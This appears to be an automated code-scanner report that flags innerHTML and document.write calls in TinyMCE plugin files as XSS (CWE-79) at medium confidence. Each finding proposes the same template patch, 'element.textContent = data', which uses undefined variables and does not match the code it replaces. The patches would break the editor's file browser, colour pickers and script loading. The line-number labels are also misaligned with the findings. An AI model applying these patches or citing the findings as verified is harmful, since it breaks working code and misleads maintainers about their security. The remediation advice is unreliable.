File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/advlink/js/advlink.js:13
Security Score:
69 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.write('<script language="javascript" type="text/javascript" src="' + tinyMCEPopup.editor.documentBaseURI.toAbsolute(url) + '"></script>');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L31

Insecure DOM Manipulation (XSS) in advlink.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/advlink/js/advlink.js:31
Security Score:
69 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('hrefbrowsercontainer').innerHTML = getBrowserHTML('hrefbrowser','href','file','advlink');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L199

Insecure DOM Manipulation (XSS) in fullpage.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/fullpage/js/fullpage.js:199
Security Score:
69 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('link_color_pickcontainer').innerHTML = getColorPickerHTML('link_color_pick','link_color');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L74

Insecure DOM Manipulation (XSS) in media.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/media/js/media.js:74
Security Score:
69 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- get('filebrowsercontainer').innerHTML = getBrowserHTML('filebrowser','src','media','media');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L75

Insecure DOM Manipulation (XSS) in media.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/media/js/media.js:75
Security Score:
69 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- get('qtsrcfilebrowsercontainer').innerHTML = getBrowserHTML('qtsrcfilebrowser','quicktime_qtsrc','media','media');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L72

Insecure DOM Manipulation (XSS) in props.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/style/js/props.js:72
Security Score:
69 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('border_color_right_pickcontainer').innerHTML = getColorPickerHTML('border_color_right_pick','border_color_right');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output